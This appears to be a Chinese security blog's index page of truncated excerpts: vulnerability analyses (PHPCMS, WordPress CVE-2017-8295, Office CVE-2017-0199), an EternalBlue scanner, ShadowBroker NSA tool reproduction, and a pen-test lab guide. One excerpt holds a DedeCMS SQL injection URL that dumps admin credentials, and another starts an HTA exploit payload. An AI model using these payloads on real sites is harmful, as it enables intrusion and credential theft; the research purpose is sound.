PHPCMS V9.6.2 SQL注入漏洞分析

在会员前台管理中心接口的继承父类foreground:/phpcms/modules/member/index.php LINE 11class index extends foreground {    private $times_db;    function __construct() {        parent::__con

暗链隐藏的N种姿势

一、介绍暗链也称黑链,即隐蔽链接,是黑帽SEO的作弊手法之一,其目的就是利用高权重网站外链来提升自身站点排名。    一般来说,暗链是由攻击者入侵网站后植入的,暗链在网页页面上不可见或者极易被忽略,但是搜索引擎仍然可以通过分析网页的源代码收录这些链接,如果有大量网站甚至一些高权重的网站都链向它们,积少成多,可以迅速提高权重,获得高额流量。暗链指向的网站绝大多数是博彩、非法游戏私服、虚假医疗、办证等黑灰色产业,其中博彩类域名数量最多。而暗链宿主往往是权重较高的网页,例如政府网站

“永恒之蓝(MS17-010)”批量远程检测工具

关于永恒之蓝(MS17-010)漏洞


如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。


使用方法


-h 192.168.4.4


-n  192.168.4.0/24


WordPress曝未经授权的密码重置漏洞(CVE-2017-8295 )

漏洞提交者:Dawid Golunski漏洞编号:CVE-2017-8295发布日期:2017-05-03修订版本:1.0漏洞危害:中/高I. 漏洞WordPress内核<= 4.7.4存在未经授权的密码重置(0day)II. 背景WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月,Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。III. 介绍

08cms房地产存储型XSS

08cms房地产存储型xss

OFFICE OLE2LINK(CVE-2017-0199)漏洞利用详解

漏洞概述FireEye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。漏洞利用方法首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下:test789<script>var objShell = new A

ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法

工具下载1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败):复现python和pywin32安装包   2、Shadowbroker放出的NSA攻击工具https://github.com/misterch0c/shadowbroker3、中招检查工具中招检查工具注:检查工具已重写了(各有所需,你可以根据自己需要修改)一、 漏洞复现1.    前期准备攻击系统信息列表如下:IP

phpcms v9前台getshell

看到到处都是这个漏洞的利用.加班完这个点看看触发点.主要的问题是phpcms\modules\member\index.php 130行到140行//附表信息验证 通过模型获取会员信息if($member_setting['choosemodel']) {    require_once CACHE_MODEL_PATH.'member_input.class.php';    req

dedecms最新注入和getshell漏洞利用

条件利用:1.漏洞代码在/plus/advancedsearch.php 文件中2.php.ini要开启session.auto_start = 13.必须知道一个存在的mid,需要后台有添加自定义搜索模型爆账号密码poc:http://localhost/dedecms/plus/advancedsearch.php?mid=1&_SESSION[123]=select concat(0x7c,userid,0x7c,pwd,0x7c) as aid from `%[email protected]__admin

手把手教你如何搭建自己的渗透测试环境

介绍白帽子是指个体发起的黑客攻击,找到系统潜在的可能被恶意黑客利用的的漏洞或脆弱点。在目标不知情或者没得到授权的情况下发起黑客攻击是非法的。所以通常是建立一个自己的实验室,练习黑客技术。在这个实验室里,你能看到如何创建一个自己的黑客环境,练习各种各样的黑客攻击技术。我们将会探讨不同类型的虚拟系统,构建一个虚拟网络,在虚拟环境中运行试用版的操作系统,搭建一个有漏洞的web应用程序,安装Kali LInux,执行渗透测试。所需条件:VMware WorkstationWindows XP系统映像Ka